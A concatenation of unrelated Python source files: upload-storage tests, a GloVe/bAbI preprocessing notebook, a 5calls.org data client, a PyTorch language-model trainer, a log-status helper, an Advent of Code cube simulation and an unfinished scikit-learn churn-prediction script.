assert 'CANNOT WRITE FILE' == ex.get_message()
finally:
Files.chmod(file, 0o666)
storage.remove(self._mock_test_file())
def test_deleted(self):
file = self._mock_test_file()
storage = self._mock_storage()
assert not storage.exists(file)
storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz', 0)
assert storage.exists(file)
try:
storage.remove(file)
storage.remove(file) # fail
assert False, 'Deleting non-existent file!'
except UploadException as ex:
assert 'CANNOT REMOVE DATA' == ex.get_message()
class TargetTest(CommonTestClass):
def test_fail_no_remote(self):
lang = Translations()
lib = TargetSearch(lang, InfoRam(lang), DataRam(lang))
try:
lib.process()
assert False, 'No remote and passed'
except UploadException as ex:
assert 'SENT FILE NAME IS EMPTY' == ex.get_message()
def test_fail_no_target(self):
lang = Translations()
lib = TargetSearch(lang, InfoRam(lang), DataRam(lang))
lib.set_remote_file_name('abcdefg')
try:
lib.process()
assert False, 'No target and passed'
except UploadException as ex:
assert 'TARGET DIR IS NOT SET' == ex.get_message()
def test_fail_no_base(self):
lang = Translations()
lib = TargetSearch(lang, InfoRam(lang), DataRam(lang))
try:
lib.get_final_target_name()
assert False, 'No final target name and passed'
except UploadException as ex:
assert 'UPLOAD FILE NAME IS EMPTY' == ex.get_message()
def test_process_clear(self):
lang = Translations()
lib = TargetSearch(lang, InfoRam(lang), DataRam(lang))
lib.set_target_dir(self._get_test_dir()).set_remote_file_name('what can be found$.here').process()
assert 'what_can_be_found.here' == lib.get_final_target_name()
assert self._get_test_dir() + 'what_can_be_found' + TargetSearch.FILE_DRIVER_SUFF == lib.get_driver_location()
assert self._get_test_dir() + 'what_can_be_found.here' + TargetSearch.FILE_UPLOAD_SUFF == lib.get_temporary_target_location()
def test_process_no_clear(self):
lang = Translations()
lib = TargetSearch(lang, InfoRam(lang), DataRam(lang), False, False)
lib.set_target_dir(self._get_test_dir()).set_remote_file_name('what el$e can be found').process()
assert 'what el$e can be found' == lib.get_final_target_name()
assert self._get_test_dir() + 'what el$e can be found' + TargetSearch.FILE_DRIVER_SUFF == lib.get_driver_location()
assert self._get_test_dir() + 'what el$e can be found' + TargetSearch.FILE_UPLOAD_SUFF == lib.get_temporary_target_location()
def test_process_name_lookup(self):
lang = Translations()
data_ram = DataRam(lang)
data_ram.add_part(self._get_test_dir() + 'dummyFile.tst', 'asdfghjklqwertzuiopyxcvbnm')
data_ram.add_part(self._get_test_dir() + 'dummyFile.0.tst', 'asdfghjklqwertzuiopyxcvbnm')
data_ram.add_part(self._get_test_dir() + 'dummyFile.1.tst', 'asdfghjklqwertzuiopyxcvbnm')
data_ram.add_part(self._get_test_dir() + 'dummyFile.2.tst', 'asdfghjklqwertzuiopyxcvbnm')
lib = TargetSearch(lang, InfoRam(lang), data_ram, False, False)
lib.set_target_dir(self._get_test_dir()).set_remote_file_name('dummyFile.tst').process()
assert self._get_test_dir() + 'dummyFile.3.tst' + TargetSearch.FILE_UPLOAD_SUFF == lib.get_temporary_target_location()
|
<gh_stars>0
# coding: utf-8
# In[1]:
import numpy as np
from __future__ import division
filename = 'glove.6B.100d.txt'
def loadEmbeddings(filename):
vocab = []
embd = []
file = open(filename,'r')
for line in file.readlines():
row = line.strip().split(' ')
vocab.append(row[0])
embd.append(row[1:])
print('Loaded!')
file.close()
return vocab,embd
vocab,embd = loadEmbeddings(filename)
word_vec_dim = len(embd[0])
vocab.append('<UNK>')
embd.append(np.asarray(embd[vocab.index('unk')],np.float32)+0.01)
vocab.append('<EOS>')
embd.append(np.asarray(embd[vocab.index('eos')],np.float32)+0.01)
vocab.append('<PAD>')
embd.append(np.zeros((word_vec_dim),np.float32))
embedding = np.asarray(embd)
embedding = embedding.astype(np.float32)
# In[2]:
def word2vec(word): # converts a given word into its vector representation
if word in vocab:
return embedding[vocab.index(word)]
else:
return embedding[vocab.index('<UNK>')]
def most_similar_eucli(x):
xminusy = np.subtract(embedding,x)
sq_xminusy = np.square(xminusy)
sum_sq_xminusy = np.sum(sq_xminusy,1)
eucli_dists = np.sqrt(sum_sq_xminusy)
return np.argsort(eucli_dists)
word = 'frog'
most_similars = most_similar_eucli(word2vec(word))
print "TOP TEN MOST SIMILAR WORDS TO '"+str(word)+"':\n"
for i in xrange(0,10):
print str(i+1)+". "+str(vocab[most_similars[i]])
def vec2word(vec): # converts a given vector representation into the represented word
most_similars = most_similar_eucli(np.asarray(vec,np.float32))
return vocab[most_similars[0]]
# In[3]:
import string
# Data related to basic induction training and testing from QA bAbi tasks dataset will be used.
# (https://research.fb.com/downloads/babi/)
filename = 'qa16_basic-induction_train.txt'
fact_story = []
question = []
answer = []
max_fact_len = 0
max_question_len = 0
def extract_info(filename,max_fact_len,max_question_len):
fact_story = []
fact_stories = []
questions = []
answers = []
file = open(filename,'r')
for line in file.readlines():
flag_end_story = 0
line = line.lower()
if '?' in line:
#q for question, a for answer.
flag_end_story=1
qa = line.strip().split('\t')
q = qa[0]
a = qa[1]
q = q.translate(None, string.punctuation)
a = a.translate(None, string.punctuation)
q = q.strip().split(' ')
a = a.strip().split(' ')
q = q[1:]
q = map(word2vec,q)
questions.append(q)
if len(q)>max_question_len:
max_question_len = len(q)
answers.append(map(vocab.index,a))
else:
line = line.translate(None, string.punctuation)
fact = line.strip().split(' ')
fact = fact[1:]
fact = map(word2vec,fact)
fact_story.append(fact)
if len(fact)>max_fact_len:
max_fact_len=len(fact)
if flag_end_story == 1:
fact_stories.append(fact_story)
fact_story = []
file.close()
return fact_stories,questions,answers,max_fact_len,max_question_len
fact_stories,questions,answers,max_fact_len,max_question_len = extract_info(filename,max_fact_len,max_question_len)
filename = 'qa16_basic-induction_test.txt'
test_fact_stories,test_questions,test_answers,max_fact_len,max_question_len = extract_info(filename,max_fact_len,max_question_len)
# In[4]:
print max_fact_len
print max_question_len
# In[5]:
print map(vec2word,fact_stories[0][0])
# In[6]:
print map(vec2word,test_fact_stories[0][0])
# In[7]:
PAD = word2vec('<PAD>')
for i in xrange(0,len(questions)):
questions_len = len(questions[i])
for j in xrange(questions_len,max_question_len):
questions[i].append(PAD)
for j in xrange(0,len(fact_stories[i])):
fact_len = len(fact_stories[i][j])
for k in xrange(fact_len,max_fact_len):
fact_stories[i][j].append(PAD)
# In[8]:
print map(vec2word,fact_stories[0][2])
# In[9]:
for i in xrange(0,len(test_questions)):
questions_len = len(test_questions[i])
for j in xrange(questions_len,max_question_len):
test_questions[i].append(PAD)
for j in xrange(0,len(test_fact_stories[i])):
fact_len = len(test_fact_stories[i][j])
for k in xrange(fact_len,max_fact_len):
test_fact_stories[i][j].append(PAD)
# In[10]:
print map(vec2word,test_fact_stories[0][3])
# In[11]:
fact_stories = np.asarray(fact_stories,np.float32)
print fact_stories.shape
questions = np.asarray(questions,np.float32)
print questions.shape
answers = np.asarray(answers,np.int32)
print answers.shape
test_fact_stories = np.asarray(test_fact_stories,np.float32)
print test_fact_stories.shape
test_questions = np.asarray(test_questions,np.float32)
print test_questions.shape
test_answers = np.asarray(test_answers,np.int32)
print test_answers.shape
# In[12]:
#Saving processed data in another file.
import pickle
PICK = [fact_stories,questions,answers,test_fact_stories,test_questions,test_answers]
with open('embeddingPICKLE', 'wb') as fp:
pickle.dump(PICK, fp)
|
<reponame>foozmeat/hotline<gh_stars>1-10
import json
from pathlib import Path
import requests
from fivecalls.networking import http_get_json
from fivecalls.singleton import Singleton
class FiveCallsModel:
def __init__(self, **kwargs):
if kwargs:
for key, val in kwargs.items():
setattr(self, key, val)
def __str__(self):
""" Returns a string representation of TwitterModel. By default
this is the same as AsJsonString(). """
return self.AsJsonString()
def AsJsonString(self) -> str:
""" Returns the TwitterModel as a JSON string based on key/value
pairs returned from the AsDict() method. """
return json.dumps(self.__dict__, sort_keys=True)
class Issue(FiveCallsModel):
def __init__(self, **kwargs):
self.id: str = None
self.name: str = None
self.script: str = None
self.reason: str = None
self.categories: [dict] = []
self.contacts: [dict] = []
self.inactive: bool = True
self.link: str = None
self.linkTitle: str = None
self.slug: str = None
super().__init__(**kwargs)
def __str__(self):
return f"({self.id}) {self.name}"
# class Category(FiveCallsModel):
#
# def __init__(self, **kwargs):
# self.name: str = None
# self.issues: [Issue] = []
#
# super().__init__(**kwargs)
# class Contact(FiveCallsModel):
#
# def __init__(self, **kwargs):
# self.id: str = None
# self.name: str = None
# self.phone: str = None
# self.photoURL: str = None
# self.party: str = None
# self.state: str = None
# self.reason = None
# self.area = None
# self.field_offices: [dict] = []
#
# super().__init__(**kwargs)
DATA_PATH = 'data/'
IMAGE_PATH = DATA_PATH + 'images/'
JSON_PATH = DATA_PATH + 'fivecalls.json'
class FiveCallsData(metaclass=Singleton):
def __init__(self):
self.issues = []
self.active_issues = []
self.categories = {}
self.contacts = {}
self.global_count = 0
if not Path(JSON_PATH).exists():
self.fetch()
with open(JSON_PATH, 'r') as fp:
self._data = json.load(fp)
for i in self._data['issues']:
new_issue = Issue(**i)
if not new_issue.inactive:
self.active_issues.append(new_issue)
for c in i['categories']:
existing_category = self.categories.get(c['name'], None)
if not existing_category:
self.categories[c['name']] = []
self.categories[c['name']].append(new_issue)
for c in i['contacts']:
self.contacts[c['id']] = c
self.issues.append(new_issue)
self.global_count = self._data['global_count']
def fetch(self) -> bool:
data = http_get_json(
"https://5calls.org/issues/",
params={
"all": "true",
"address": "97211",
},
)
if data:
for i in data['issues']:
for contact in i['contacts']:
path = IMAGE_PATH + contact['id'] + '.jpg'
if not Path(path).exists() and contact['photoURL']:
try:
response = requests.get(contact['photoURL'])
except requests.exceptions.RequestException:
print('HTTP Request failed')
return False
else:
if response.ok:
with open(path, 'wb') as f:
f.write(response.content)
count_data = http_get_json(
"https://5calls.org/report/",
params={},
)
data['global_count'] = int(count_data['count'])
with open(JSON_PATH, 'w') as fp:
json.dump(data, fp)
return True
else:
return False
if __name__ == '__main__':
fcd = FiveCallsData()
if fcd.fetch():
print(f"issues: {len(fcd.issues)}")
print(f"active issues: {len(fcd.active_issues)}")
print(f"categories: {len(fcd.categories)}")
|
import argparse
import time
import math
import torch
import torch.nn as nn
import torch.optim as optim
import data
parser = argparse.ArgumentParser(description='PyTorch Language Modeling')
parser.add_argument('--data', type=str, default='penn',
help='data corpus (penn, wikitext-2, wikitext-103)')
parser.add_argument('--model', type=str, default='DNC',
help='type of recurrent net (LSTM, Transformer, DNC)')
parser.add_argument('--emsize', type=int, default=50,
help='size of word embeddings')
parser.add_argument('--nhid', type=int, default=200,
help='number of hidden units per layer')
parser.add_argument('--nlayers', type=int, default=2,
help='number of layers')
parser.add_argument('--lr', type=float, default=20,
help='initial learning rate')
parser.add_argument('--clip', type=float, default=0.25,
help='gradient clipping')
parser.add_argument('--epochs', type=int, default=40,
help='upper epoch limit')
parser.add_argument('--batch_size', type=int, default=20, metavar='N',
help='batch size')
parser.add_argument('--bptt', type=int, default=35,
help='sequence length')
parser.add_argument('--dropout', type=float, default=0.2,
help='dropout applied to layers (0 = no dropout)')
parser.add_argument('--tied', action='store_true',
help='tie the word embedding and softmax weights')
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--cuda', action='store_true',
help='use CUDA')
parser.add_argument('--log-interval', type=int, default=200, metavar='N',
help='report interval')
parser.add_argument('--nhead', type=int, default=2,
help='the number of heads in the encoder/decoder of the transformer model')
args = parser.parse_args()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
device = torch.device("cuda" if args.cuda else "cpu")
name = args.data + '_' + args.model
path = './res/' + name + '.pt'
###############################################################################
# Load data
###############################################################################
corpus = data.Corpus('./data/' + args.data)
# Starting from sequential data, batchify arranges the dataset into columns.
# For instance, with the alphabet as the sequence and batch size 4, we'd get
# ┌ a g m s ┐
# │ b h n t │
# │ c i o u │
# │ d j p v │
# │ e k q w │
# └ f l r x ┘.
# These columns are treated as independent by the model, which means that the
# dependence of e. g. 'g' on 'f' can not be learned, but allows more efficient
# batch processing.
def batchify(data, bsz):
# Work out how cleanly we can divide the dataset into bsz parts.
nbatch = data.size(0) // bsz
# Trim off any extra elements that wouldn't cleanly fit (remainders).
data = data.narrow(0, 0, nbatch * bsz)
# Evenly divide the data across the bsz batches.
data = data.view(bsz, -1).t().contiguous()
return data.to(device)
eval_batch_size = 10
train_data = batchify(corpus.train, args.batch_size)
val_data = batchify(corpus.valid, eval_batch_size)
test_data = batchify(corpus.test, eval_batch_size)
###############################################################################
# Build the model
###############################################################################
ntokens = len(corpus.dictionary)
if args.model == 'LSTM':
from model.rnn_lm import RNNLM
model = RNNLM(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied).to(device)
elif args.model == 'Transformer':
from model.transformer_lm import TransformerLM
model = TransformerLM(ntokens, args.emsize, args.nhead, args.nhid, args.nlayers, args.dropout).to(device)
elif args.model == 'DNC':
from model.dnc_lm import DNCLM
model = DNCLM(ntoken=ntokens, ninp=args.emsize, nhid=args.nhid, nlayers=args.nlayers, dropout=args.dropout).to(device)
criterion = nn.CrossEntropyLoss()
print(args)
###############################################################################
# Training code
###############################################################################
def detach_hidden(h):
"""Wraps hidden states in new Tensors, to detach them from their history."""
if isinstance(h, torch.Tensor):
return h.detach()
elif h is None:
return h
elif isinstance(h, list):
return list(detach_hidden(v) for v in h)
elif isinstance(h, tuple):
return tuple(detach_hidden(v) for v in h)
elif isinstance(h, dict):
for k, v in h.items():
h[k] = detach_hidden(v)
return h
else:
return h
# get_batch subdivides the source data into chunks of length args.bptt.
# If source is equal to the example output of the batchify function, with
# a bptt-limit of 2, we'd get the following two Variables for i = 0:
# ┌ a g m s ┐ ┌ b h n t ┐
# └ b h n t ┘ └ c i o u ┘
# Note that despite the name of the function, the subdivison of data is not
# done along the batch dimension (i.e. dimension 1), since that was handled
# by the batchify function. The chunks are along dimension 0, corresponding
# to the seq_len dimension in the LSTM.
def get_batch(source, i):
seq_len = min(args.bptt, len(source) - 1 - i)
data = source[i:i+seq_len]
target = source[i+1:i+1+seq_len].view(-1)
return data, target
def evaluate(data_source):
# Turn on evaluation mode which disables dropout.
model.eval()
total_loss = 0.
ntokens = len(corpus.dictionary)
if args.model != 'Transformer':
hidden = model.init_hidden(eval_batch_size)
with torch.no_grad():
for i in range(0, data_source.size(0) - 1, args.bptt):
data, targets = get_batch(data_source, i)
if args.model == 'Transformer':
output = model(data)
else:
output, hidden = model(data, hidden)
hidden = detach_hidden(hidden)
output_flat = output.view(-1, ntokens)
total_loss += len(data) * criterion(output_flat, targets).item()
return total_loss / (len(data_source) - 1)
def train():
# Turn on training mode which enables dropout.
model.train()
total_loss = 0.
start_time = time.time()
ntokens = len(corpus.dictionary)
if args.model != 'Transformer':
hidden = model.init_hidden(args.batch_size)
for batch, i in enumerate(range(0, train_data.size(0) - 1, args.bptt)):
data, targets = get_batch(train_data, i)
# Starting each batch, we detach the hidden state from how it was previously produced.
# If we didn't, the model would try backpropagating all the way to start of the dataset.
model.zero_grad()
if args.model == 'LSTM':
hidden = detach_hidden(hidden)
output, hidden = model(data, hidden)
elif args.model == 'Transformer':
output = model(data)
elif args.model == 'DNC':
hidden = detach_hidden(hidden)
output, hidden = model(data, hidden)
loss = criterion(output.view(-1, ntokens), targets)
loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
optimizer.step()
total_loss += loss.item()
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss / args.log_interval
elapsed = time.time() - start_time
print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2e} | ms/batch {:5.2f} | '
'loss {:5.2f} | ppl {:8.2f}'.format(
epoch, batch, len(train_data) // args.bptt, lr,
elapsed * 1000 / args.log_interval, cur_loss, math.exp(cur_loss)))
total_loss = 0
start_time = time.time()
# Loop over epochs.
lr = args.lr
best_val_loss = None
# optimizer = optim.Adam(model.parameters(), lr=lr)
optimizer = optim.SGD(model.parameters(), lr=lr)
# At any point you can hit Ctrl + C to break out of training early.
try:
for epoch in range(args.epochs):
epoch_start_time = time.time()
train()
val_loss = evaluate(val_data)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f}'.format(epoch, (time.time() - epoch_start_time),
val_loss, math.exp(val_loss)))
print('-' * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
torch.save(model, path)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4
for param_group in optimizer.param_groups:
param_group['lr'] = lr
except KeyboardInterrupt:
print('-' * 89)
print('Exiting from training early')
# Load the best saved model.
model = torch.load(path)
# after load the rnn params are not a continuous chunk of memory
# this makes them a continuous chunk, and will speed up forward pass
# Currently, only rnn model supports flatten_parameters function.
if args.model in ['LSTM']:
model.rnn.flatten_parameters()
# Run on test data.
test_loss = evaluate(test_data)
print('=' * 89)
print('| End of training | test loss {:5.2f} | test ppl {:8.2f}'.format(
test_loss, math.exp(test_loss)))
print('=' * 89)
|
<gh_stars>1-10
from importer import *
import os
import numpy as np
from datetime import datetime as dt
import re
def gen_logfile_name(plateifu):
plate, ifu = plateifu.split('-')
status_file_dir = os.path.join(
os.environ['PCAY_RESULTSDIR'], plate)
status_file = os.path.join(status_file_dir, '{}.log'.format(plateifu))
return status_file
def log_file_exists(plateifu):
status_file = gen_logfile_name(plateifu)
return os.path.exists(status_file)
def log_indicates_complete(plateifu):
'''judges galaxy completeness and rerun priority based on log-file
'''
status_file = gen_logfile_name(plateifu)
if not log_file_exists(plateifu):
# if log-file hasn't been written, a previous parent process probably died
# before getting to it, so probably good to re-run
complete, hipri = False, True
else:
# if log file exists, check contents of last two lines for graceful exit and analysis success
with open(status_file, 'r') as logf:
lines = logf.readlines()
if not re.search('ENDING GRACEFULLY', lines[-1]):
# if last line of logfile does not indicate graceful exit from analysis
# this is probably a segfault case, so do not prioritize for re-run
complete, hipri = False, False
elif not re.search('SUCCESS', lines[-2]):
# if second-last line of logfile does not indicate success
# this is probably some other error like missing data,
# and it would be worth trying to re-run
complete, hipri = False, True
else:
# if last line indicates graceful exit, AND second-last line indicates overall success
# this galaxy is done, and shouldn't be re-run at all
complete, hipri = True, False
return complete, hipri
def write_log_file(plateifu, msg, clobber=False):
'''write a log file
'''
status_file = gen_logfile_name(plateifu)
status_file_dir = os.path.dirname(status_file)
if not os.path.exists(status_file_dir):
os.makedirs(status_file_dir)
msg_withtime = '{} {}'.format(dt.now().strftime('%Y/%m/%d@%H:%M:%S'), msg)
if clobber:
mode = 'w'
msg_logged = msg_withtime
else:
mode = 'a'
msg_logged = '\n{}'.format(msg_withtime)
with open(status_file, mode) as logf:
logf.write(msg_logged)
def summary_remaining(drpall, group_col='ifudesignsize'):
complete, hipri = zip(*list(map(log_indicates_complete, drpall['plateifu'])))
complete, hipri = np.array(complete), np.array(hipri)
drpall['complete'] = complete
drpall['hipri_rerun'] = hipri
drpall['lopri_rerun'] = (~hipri) & (~complete)
runtab = drpall[group_col, 'complete', 'hipri_rerun', 'lopri_rerun']
runtab_group = runtab.group_by(group_col)
runtab_groupstats = runtab_group.groups.aggregate(np.sum)
print(runtab_groupstats)
if __name__ == '__main__':
import manga_tools as m
drpall = m.load_drpall(mpl_v)
drpall = drpall[(drpall['ifudesignsize'] > 0) * (drpall['nsa_z'] != -9999.)]
#print(drpall)
summary_remaining(drpall)
|
<filename>2020/17.py
import time
def calc_neighbours(coordinates, state, expand=True, four_d = False):
new_cells = dict()
live_neighbours = 0
w_range = range(-1, 2) if four_d else [0]
for dx in range(-1, 2):
for dy in range(-1, 2):
for dz in range(-1, 2):
for dw in w_range:
if dx == 0 and dy == 0 and dz == 0 and dw == 0:
continue # This is ourself
neighbour_coordinates = (coordinates[0] + dx, coordinates[1] + dy, coordinates[2] + dz, coordinates[3] + dw)
if neighbour_coordinates in state:
if state[neighbour_coordinates][0] != '.':
# This is a neigbouring live cube
live_neighbours += 1
elif expand and state[coordinates][0] == '#':
# Expand space to cover this neigbour for future generations
new_cells[neighbour_coordinates] = ['.', calc_neighbours(neighbour_coordinates, state, False, four_d)[0]]
return (live_neighbours, new_cells)
def calc_all_neighbours(state, four_d):
new = dict()
for k in state:
(live_neighbours, new_cells) = calc_neighbours(k, state, True, four_d)
state[k][1] = live_neighbours
for new_cell in new_cells:
new[new_cell] = new_cells[new_cell]
# Add all of the cells we're not currently tracking, but are next to an existing cell
for i in new:
state[i] = new[i]
def init_state(items):
rows = len(items)
cols = len(items[0])
state = dict()
for ny,y in enumerate(items):
for nx,x in enumerate(y):
state[(nx,ny,0,0)] = [x, 0]
return state
def do_generation(state, four_d):
calc_all_neighbours(state, four_d)
# If any cells are dead, and have no live neighbours, we can remove them from the simulation for efficiency
cells_to_remove = [k for k in state if state[k][0] == '.' and state[k][1] < 3]
for k in cells_to_remove: del state[k]
for k in state:
if state[k][0] == '.' and state[k][1] == 3:
state[k][0] = '#'
elif state[k][0] == '#' and (state[k][1] < 2 or state[k][1] > 3):
state[k][0] = '.'
def run_simulation(state, num_generations, four_d=False):
for i in range(num_generations):
do_generation(state, four_d)
live_count = len([1 for s in state if state[s][0] == '#'])
print(f'After generation {i+1} there are {live_count} live cells')
return live_count
def main():
results = []
with open('17-input.txt', 'r') as f:
items = [i.strip() for i in f.read().splitlines()]
# Part 1
print('Part 1')
state = init_state(items)
results.append(run_simulation(state, 6))
# Part 2
print('Part 2')
state = init_state(items)
results.append(run_simulation(state, 6, True))
for i,s in enumerate(results):
print(f'{i+1}: {s}')
if __name__ == '__main__':
start_time = time.time_ns()
main()
print("--- Executed in {0:.3f} seconds ---".format((time.time_ns() - start_time) / (10 ** 9))) |
<reponame>blallen/CodePractice<gh_stars>0
from sklearn.preprocessing import MinMaxScaler
from sklearn.compose import make_column_transformer
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.colors as mcolors
import numpy
import pandas
import sklearn
import matplotlib.pyplot as plot
import matplotlib.patches as mpatches
import scikitplot as skplot
from sklearn import impute
from sklearn import preprocessing
from sklearn import pipeline
from sklearn import compose
from sklearn import model_selection
from sklearn import metrics
from sklearn import ensemble
###############
## Get the data
###############
# import data
df_churn = pandas.read_csv('mergedcustomers_missing_values_GENDER.csv')
#remove columns that are not required
df_churn = df_churn.drop(['ID'], axis=1)
print(df_churn.head())
###############
## Basic Counting
###############
print("The dataset contains columns of the following data types : \n" +str(df_churn.dtypes))
print("The dataset contains following number of records for each of the columns : \n" +str(df_churn.count()))
print( "Each category within the churnrisk column has the following count : ")
print(df_churn.groupby(['CHURNRISK']).size())
# .count() will do a count in each column, lots of redudant data
# .size() will do the same count, but only display once for each value of 'CHURNRISK'
###############
## Basic Plotting
###############
#bar chart to show split of data
index = ['High','Medium','Low']
color = ['#BB6B5A','#8CCB9B','#E5E88B']
title = "Total number for occurences of churn risk " + str(df_churn['CHURNRISK'].count())
# fig size is in inches x.x
churn_plot = df_churn['CHURNRISK'] \
.value_counts(sort = True, ascending = False) \
.plot(kind = 'bar', figsize=(4,4), title = title, color = color)
churn_plot.set_xlabel("Churn Risk")
churn_plot.set_ylabel("Frequency")
churn_plot.get_figure().savefig('churn_plot.pdf', bbox_inches='tight')
# bbox_inches='tight' is magic
###############
## Data Cleaning
###############
# Defining the categorical columns
columns_categorical = ['GENDER', 'STATUS', 'HOMEOWNER']
print("Categorical columns : ")
print(columns_categorical)
impute_categorical = impute.SimpleImputer(strategy = 'most_frequent')
# why not mode? who knows?
onehot_categorical = preprocessing.OneHotEncoder(
handle_unknown = 'error',
drop = 'if_binary',
)
transformer_categorical = pipeline.Pipeline(
steps = [
('impute', impute_categorical),
('onehot', onehot_categorical),
]
)
# Defining the numerical columns
columns_numerical = df_churn.select_dtypes(
include = [numpy.float, numpy.int]
).columns
print("Numerical columns : ")
print(columns_numerical)
scaler_numerical = preprocessing.StandardScaler()
transformer_numerical = pipeline.Pipeline(steps = [('scale', scaler_numerical)])
# start setting up preprocessors
preprocessor_categorical = compose.ColumnTransformer(
transformers = [('cat', transformer_categorical, columns_categorical)],
remainder = 'passthrough',
)
preprocessor_numerical = compose.ColumnTransformer(
transformers = [('num', transformer_numerical, columns_numerical)],
remainder = 'passthrough',
)
preprocessor_all = compose.ColumnTransformer(
transformers = [
('cat', transformer_categorical, columns_categorical),
('num', transformer_numerical, columns_numerical),
],
remainder = 'passthrough'
)
# The transformation happens in the pipeline. Temporarily done here to show what intermediate value looks like.
# ColumnTransformer.fit_transform() returns a numpy.ndarray
# wrap with pandas.DataFrame for more utility
df_churn_cat = pandas.DataFrame(preprocessor_categorical.fit_transform(df_churn))
print("Data after transforming categorical columns:")
print(df_churn_cat.head())
df_churn_num = pandas.DataFrame(preprocessor_numerical.fit_transform(df_churn))
print("Data after transforming numerical columns:")
print(df_churn_num.head())
df_churn_all = pandas.DataFrame(preprocessor_all.fit_transform(df_churn))
print("Data after transforming all columns:")
print(df_churn_all.head())
# prepare data frame for splitting into train and test sets
features = df_churn.drop(['CHURNRISK'], axis = 1)
label = df_churn['CHURNRISK']
label_encoder = preprocessing.LabelEncoder()
label = label_encoder.fit_transform(label)
print("Encoded value of Churnrisk after applying label encoder : " + str(label))
###############
## Fancy Plotting
###############
'''
convert label # to hexcode color
'''
def colormap(risk_list):
cols=[]
for l in risk_list:
if l == 0: # high
cols.append('#BB6B5A')
elif l == 2: # medium
cols.append('#E5E88B')
elif l == 1: # low
cols.append('#8CCB9B')
return cols
pop_a = mpatches.Patch(color='#BB6B5A', label='High')
pop_b = mpatches.Patch(color='#E5E88B', label='Medium')
pop_c = mpatches.Patch(color='#8CCB9B', label='Low')
handles = [pop_a, pop_b, pop_c]
area = 75
x = df_churn['ESTINCOME']
y = df_churn['DAYSSINCELASTTRADE']
z = df_churn['TOTALDOLLARVALUETRADED']
fig = plot.figure(figsize = (12, 6))
fig.suptitle('2D and 3D view of churn risk data')
# first sub plot
ax_2D = fig.add_subplot(1, 2, 1)
ax_2D.scatter(x, y, alpha = 0.8, c = colormap(label), s = area)
ax_2D.set_ylabel('DAYS SINCE LAST TRADE')
ax_2D.set_xlabel('ESTIMATED INCOME')
plot.legend(handles = handles)
# second sub plot
ax_3D = fig.add_subplot(1, 2, 2, projection = '3d')
ax_3D.scatter(z, x, y, c = colormap(label), marker = 'o')
ax_3D.set_xlabel('TOTAL DOLLAR VALUE TRADED')
ax_3D.set_ylabel('ESTIMATED INCOME')
ax_3D.set_zlabel('DAYS SINCE LAST TRADE')
plot.legend(handles = handles)
fig.savefig('fancy_plot.pdf', bbox_inches='tight')
###############
## Split data
###############
X_train, X_test, y_train, y_test = model_selection.train_test_split(features, label, random_state = 0)
print("Dimensions of datasets that will be used for training : Input features" + str(X_train.shape) + " Output label" + str(y_train.shape))
print("Dimensions of datasets that will be used for testing : Input features" + str(X_test.shape) + " Output label" + str(y_test.shape))
def compare_2D(X_test, y_test, y_pred, model_name, handles):
fig = plot.figure(figsize = (10, 4))
score = metrics.accuracy_score(y_test, y_pred)
suptitle = 'Actual vs Predicted data : ' + model_name + '. Accuracy : %.2f' % score
fig.suptitle(suptitle)
ax_test = fig.add_subplot(121)
ax_test.scatter(
X_test['ESTINCOME'],
X_test['DAYSSINCELASTTRADE'],
alpha = 0.8,
c = colormap(y_test),
)
ax_test.set_xlabel('ESTIMATED INCOME')
ax_test.set_ylabel('DAYS SINCE LAST TRADE')
plot.title('Actual')
plot.legend(handles = handles)
ax_pred = fig.add_subplot(122)
ax_pred.scatter(
X_test['ESTINCOME'],
X_test['DAYSSINCELASTTRADE'],
alpha = 0.8,
c = colormap(y_pred),
)
ax_pred.set_xlabel('ESTIMATED INCOME')
ax_pred.set_ylabel('DAYS SINCE LAST TRADE')
plot.title('Predicted')
plot.legend(handles = [pop_a, pop_b, pop_c])
fig.savefig(model_name + '_2D.pdf', bbox_inches='tight')
def compare_3D(X_test, y_test, y_pred, model_name, handles):
fig = plot.figure(figsize = (10, 4))
score = metrics.accuracy_score(y_test, y_pred)
suptitle = 'Actual vs Predicted data : ' + model_name + '. Accuracy : %.2f' % score
fig.suptitle(suptitle)
ax_test = fig.add_subplot(121, projection = '3d')
ax_test.scatter(
X_test['TOTALDOLLARVALUETRADED'],
X_test['ESTINCOME'],
X_test['DAYSSINCELASTTRADE'],
alpha = 0.8,
c = colormap(y_test),
marker = 'o',
)
ax_test.set_xlabel('TOTAL DOLLAR VALUE TRADED')
ax_test.set_ylabel('ESTIMATED INCOME')
ax_test.set_zlabel('DAYS SINCE LAST TRADE')
plot.legend(handles = [pop_a, pop_b, pop_c])
plot.title('Actual')
ax_pred = fig.add_subplot(122, projection = '3d')
ax_pred.scatter(
X_test['TOTALDOLLARVALUETRADED'],
X_test['ESTINCOME'],
X_test['DAYSSINCELASTTRADE'],
alpha = 0.8,
c = colormap(y_pred),
marker = 'o',
)
ax_pred.set_xlabel('TOTAL DOLLAR VALUE TRADED')
ax_pred.set_ylabel('ESTIMATED INCOME')
ax_pred.set_zlabel('DAYS SINCE LAST TRADE')
plot.legend(handles = [pop_a, pop_b, pop_c])
plot.title('Predicted')
fig.savefig(model_name + '_3D.pdf', bbox_inches='tight')
def model_metrics(X_test, y_test, y_pred, model, name):
print("Decoded values of churn risk after applying inverse of label encoder : " + str(numpy.unique(y_pred)))
disp = metrics.plot_confusion_matrix(
model,
X_test,
y_test,
normalize = 'pred',
cmap = 'Greens',
)
disp.figure_.savefig(name + '_confusion_matrix.pdf', bbox_inches='tight')
report = metrics.classification_report(y_test, y_pred)
print("The classification report for the model : \n\n")
print(report)
###############
## Build models
###############
name_rfc = 'random_forest'
classifier_rfc = ensemble.RandomForestClassifier(
n_estimators = 100,
max_depth = 2,
random_state = 0,
)
model_rfc = pipeline.Pipeline(
steps = [
('preprocessor_all', preprocessor_all),
